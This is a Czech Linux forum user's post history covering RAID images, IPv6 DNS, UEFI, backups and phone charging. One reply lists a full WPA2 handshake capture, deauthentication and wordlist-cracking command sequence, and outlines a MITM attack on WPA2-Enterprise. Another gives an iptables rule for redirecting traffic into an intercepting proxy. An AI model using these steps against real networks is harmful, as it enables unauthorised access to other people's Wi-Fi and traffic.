Příspěvky

1306

Software / Re:mount raidu v IMG? + prohlížení archivů jako mount point

« kdy: 23. 12. 2019, 15:30:15 »

Zdravím, zajímalo by mě, zda je možné úkony v tomto článku (záchrana fakeRaid)  řešit bez nutnosti vyrábět cílový soubor (ze 2 zdrojových).

Je, osobně by mi na toto nejjednodušší přišlo napsat si NBD server, který to bude dělat.

Proc tak slozite? staci na to loopback device, prikaz losetup ze souboru s image udela block device, na kterym si uz pustite mdadm --assemble.

Ano za předpokladu, že mdadm umí daný způsob prokládání. Pokud by ho neuměl, bylo by potřeba to řešit takto nebo doimplementováním.

1307

Sítě / Re:IPv6 a dynamické DNS

« kdy: 23. 12. 2019, 13:41:02 »

Pokud je potřeba DNS, pak se obvykle neřeší dynamické adresy, ale fixní. Nebo jaký je důvod pro dynamické adresy?

Typicky ten, že máš síť, kam přicházejí a odcházejí lidé, a bylo by značně nepraktické každému, kdo přišel na jedno odpoledne, nastavovat DNS záznam.

A jinak tohle podle mě s RA nejde, potřebuješ buď DHCPv6, nebo centrální DNS vůbec neřešit (stejně to nebude fungovat pokud si někdo nastaví natvrdo 8.8.8.8 - leda že bys to publikoval i do globálního DNS) a používat mDNS.

1308

Software / Re:mount raidu v IMG? + prohlížení archivů jako mount point

« kdy: 23. 12. 2019, 13:20:36 »

Zdravím, zajímalo by mě, zda je možné úkony v tomto článku (záchrana fakeRaid)  řešit bez nutnosti vyrábět cílový soubor (ze 2 zdrojových).

Je, osobně by mi na toto nejjednodušší přišlo napsat si NBD server, který to bude dělat.

PS, je stále možné si v linuxu otevřít zip archiv ( vlastně spíš oběcně jakýkoli , vím že linux tohle se zipem uměl asi před 10 lety) jako mount point ? Logicky jen pro čtení. Hodí se to, když si to chce člověk prohlédnout obsah, a hodí se aby to fungovalo s cestami

Býval na to KIO/GVFS modul, ale to vyžaduje aplikace podporující KIO/GVFS. Teď jsem našel fuse-zip - a FUSE filesystem for zip archives with write support a archivemount - mounts an archive for access as a file system, ale nezkoušel jsem ani jedno.

1309

Server / Re:Ubuntu UEFI ext4 to md

« kdy: 19. 12. 2019, 15:29:47 »

Ahoj, taky jsem bez UEFI mohl klonovat systemy jak jsem chtel, bohuzel s UEFI musis provest jeste jeden krok, a to informovat bios o existenci noveho OS.. (resp. jeho bootloaderu na te servisni partisne).

Tohle jsem nikdy nedělal (na druhou stranu počítačů s EFI jsem zatím instaloval jen několik) a problém s tím nebyl, pouze jsem udělal grub-install a nic dalšího (je možné že to grub-install dělá automaticky?). Podle mě si firmware při každém bootu vylistuje všechny OS na EFI partition sám (což usuzuji např. z toho, že když tam strčím flashku, tak z ní bootuje, aniž bych mu to říkal), není potřeba mu to explicitně říkat -- to je potřeba jen v případě, že chceš ovlivnit, který se bude bootovat jako první. Ale ty máš jenom jeden.

Hint: MD pro EFI partition se musi vytvorit s verzi metadat 0.9 nebo 1.0, aby byly na konci.

Osobně bych EFI partition do MD nedával a pouze při aktualizaci zavaděče zkopíroval nové soubory rsyncem.

1310

Sítě / Re:Jak zprovoznit HTTPS charles proxy + wireshark + hostednetwork

« kdy: 13. 12. 2019, 05:40:22 »

. (omyl, furt klikám vedle!)

1311

Sítě / Re:Jak zprovoznit HTTPS charles proxy + wireshark + hostednetwork

« kdy: 13. 12. 2019, 05:38:40 »

Takže je kurva nějaká možnost, jak zpracovávat síťové požadavky ze zkoumaného zařízení, které proxy ignorují, že je bude zpracovávat Charles proxy? Existuje na tohle tedy i v linuxu kurva síťové pravidlo nebo nastavení iptables, aby pakety s libovolnout cílovou adresou odchytil program charles proxy, zpracoval a vyslal do internetu?

Ano, podle mě na Linuxu stačí "iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT". (a "echo 1 > /proc/sys/net/ipv4/ip_forward", ale to už asi máš) Stejným způsobem můžeš unášet i ten port 53 pro DNS.

Situace musí být asi opravdu zoufalá, když se na Rootu objevují dotazy na windowsí network stack. Šlo by takové dotazy flagovat třeba [WIN] před názvem, že by na to člověk na titulce neklikal?

A proč si to neudělal ty?

Protože změna titulku odpovědi se už neprojeví ve výpisu témat ani na homepage.

1312

Sítě / Re:Jak zprovoznit HTTPS charles proxy + wireshark + hostednetwork

« kdy: 11. 12. 2019, 23:28:00 »

Situace musí být asi opravdu zoufalá, když se na Rootu objevují dotazy na windowsí network stack. Šlo by takové dotazy flagovat třeba [WIN] před názvem, že by na to člověk na titulce neklikal?

1313

Server / Re:zalohovani s rsync

« kdy: 10. 12. 2019, 16:48:44 »

Pokud je to možné, použil bych FS se snapshoty, například btrfs.

1314

Sítě / Re:Raspberry dalši IP

« kdy: 09. 12. 2019, 22:44:48 »

https://www.raspberrypi.org/forums/viewtopic.php?f=66&t=140252

Proč tak složitě? Já to vždycky dělal přes /etc/network/interfaces, a tam se dá napsat

Kód: [Vybrat]

auto eth0
allow-hotplug eth0
iface eth0 inet static
  address xxx/mm
  gateway xxx
iface eth0 inet static
  address yyy/mm

pro více adres

1315

Hardware / Re:Monitorování a řízení spotřeby v Linuxu

« kdy: 05. 12. 2019, 17:51:46 »

Mám v panelu applet, který, pokud nejsem v zásuvce, ukazuje obsah souborů

Kód: [Vybrat]

/sys/class/power_supply/BAT0/power_now
/sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A08:00/PNP0C0A:00/power_supply/BAT0/voltage_now

Dále mám applet ukazující vytížení CPU, a když tam něco je i když by nemělo, tak to řeším, protože to téměř vždy ukazuje na chybu.

Kdysi jsem ještě míval parametry kernelu

Kód: [Vybrat]

pcie_aspm=force i915.i915_enable_rc6=1 i915.i915_enable_fbc=1 i915.lvds_downclock=1

ale to už nějak funguje samo. Jiné věci nedělám.

Pokud byl dotaz na desktop, tak tam vůbec nic.

1316

Vývoj / Re:Nekonečný číselný typ

« kdy: 04. 12. 2019, 23:56:08 »

bignum/gmp

dále bych zvážil jestli nepoužít rovnou třeba Protocol buffers, které s čísly dělají něco podobného https://developers.google.com/protocol-buffers/docs/encoding

a nebo jestli tohle není moc velký opruz a nebylo by jednodušší mít „pascalovský string“ -  na začátku jeden bajt, který říká, kolik bajtů bude následovat. Takto uložíš čísla do 2^2048, což by ti mělo stačit.

1317

Studium a uplatnění / Re:IT a zkušenost s bezpečnostní prověrkou, vyplatí se to dnes?

« kdy: 04. 12. 2019, 17:43:59 »

Potom kontakt na znamosti, pekne ale v kolonkach je treba rodne cislo znameho co zna nekoho 5 let. To rodne cislo ne kazdy vam ochotne da.

Jak má tohle fungovat? Ty: dej mi prosím r.č. On: Proč ho potřebuješ? Ty: Budu si dělat prověrku na T, ale hlavně o tom nikomu neříkej!

1318

Sítě / Re:Prolomení hesla do Wi-Fi sítě z Linuxu

« kdy: 03. 12. 2019, 00:57:18 »

Z mých poznámek (slovníkový, příp. u hashcatu kombinační -- asi se vyplatí zkusit všechna 8místná čísla, jinak nevím):

Kód: [Vybrat]

- iwlist scan, protože pak už to v monitor mode nepůjde
- airmon-ng start wlan0 - vytvoří wlan0mon
- airodump-ng wlan0mon --bssid XX:XX:XX:XX:XX:XX --channel 8 --write /tmp/wifi
- volitelně aireplay-ng -0 1 -a MAC_AP -c MAC_KLIENT wlan0mon (deauth)
- aircrack-ng /tmp/wifi-01.cap -w /tmp/wordlist.txt
- nebo ./hashcat-utils/src/cap2hccapx.bin /tmp/wifi-01.cap /tmp/wifi.hccapx; ./hashcat -m 2500 -a 0 /tmp/wifi.hccapx /tmp/wordlist.txt

A existuje na to "wifite" aby člověk nemusel furt kopírovat ty MAC adresy a čísla kanálů.

frr: Handshake se dá vynutit pomocí deautentizace („odpojení“), protože tento paket je ve WPA2 nepodepsaný a můžeš ho zfalšovat pokud znáš MAC adresu AP a klienta (což odposlechneš). Klient se automaticky zkusí připojit znova a máš handshake. Útok je pak offline, je tam středně těžká PBKDF2 se SHA. /etc/shadow u wifi? Pasivní kryptografický útok na WPA2? O čem to mluvíš?!

A heslo, nebo přinejhorším jeho hash osolený SSID sítě (což je to co se ve skutečnosti používá jako kryptografický materiál) musí mít dostupný každý klient, je úplně jedno jestli Windows nebo wpa_supplicant. WPA2 (Personal) je symetrické… (a i kdyby nebylo, tak bych chtěl vidět protokol, který zajistí, že klienta nejde naklonovat)

A jinak co se týče WPA2-Enterprise, tak tam MITM na ten TLS kanál (drtivá většina klientů nebude ověřovat certifikát, protože je překvapivě komplikované to nastavit) a pak prolomit MSCHAPv2 hrubou silou (DES) nebo možná jsou na to rainbow tabulky (na něco jsou, viz crack.sh).

1319

Hardware / Re:Je v nabíjecím obvodu mobilu lineární měnič (na 4.2V Li-ion)?

« kdy: 25. 11. 2019, 17:07:06 »

Protoze za timto obvodem je k dispozici zastropovany vykon. Tudiz kdyz tam bude vybita baterie, ktera si sama umi cucnout cely limit, nezbude zadny vykon schopen napajeni pridane zateze (onoho zarizeni). Ten zdroj se bude snazit proud omezit, ale vybita baterie si ho vzdy vezme vice nez zbyde zarizeni. Fungovat to muze jen v pripade, ze se nachazite v CV nebo nabite fazi a nabijeni baterie plus spotreba zarizeni se vejde pod proudovy limit. A vubec netusim jak by se zarizeni mohlo provozovat v pripade pred-nabijeci faze, kdy je proud drasticky omezen (priprava nabijeni, nabijeni podvybitych clanku).

Jo, to je pravda. Ale podle mě se tohle přesně děje: proud do zařízení je totiž stejně omezený (klasické USB - 500 mA, Nokia - 300 mA), a to na míň, než si mobil ve špičce řekne. No a pak je tu ještě fáze recovery (pokud má baterka pod 3 V), kdy se nabíjí jenom 50 mA, a v té zařízení opravdu nefunguje (a to AFAIK ani v „lepších rodinách“, třeba u iPhone).

1320

Hardware / Re:Je v nabíjecím obvodu mobilu lineární měnič (na 4.2V Li-ion)?

« kdy: 25. 11. 2019, 15:17:27 »

Na stopro tam bude specializovaný nabíjecí čip, který řeší nejen snížení napětí (samozřejmě DC/DC konvertorem), ale i vše kolem. Je možné, že funkce nabíjení bude součástí čipu řešícího spoustu dalších věcí.

I ty nejlevnější LiPo nabíječky na 5V -> 3.7V za 20Kč mají nejjednodušší nabíjecí čip. Mobil bude mít podstatně lepší a s menším pouzdrem.

Já teda nevím jaké nabíječky za 20 Kč kupuješ ty, ale ty moje mají TC4056A a s DC/DC konvertorem jsem ještě neviděl.

V mobilu nebude nikdy moct byt "blby" linearni regulator s omezenim proudu - uz jen z toho duvodu, ze je nutne plnit i funkce "UPS", tj ze baterie neni v exluzivnim uziti nabijecky, ale je soucasti napajeciho obvodu.

Proč lineární regulátor s omezením proudu (třeba ten TC4056A) nejde použít pro funkci UPS?

umi pocitat kolik energie dali do a z baterie

Minimálně Nokia 6230i nepočítá a ukazatel baterie na displeji přímo odpovídá naměřenému napětí.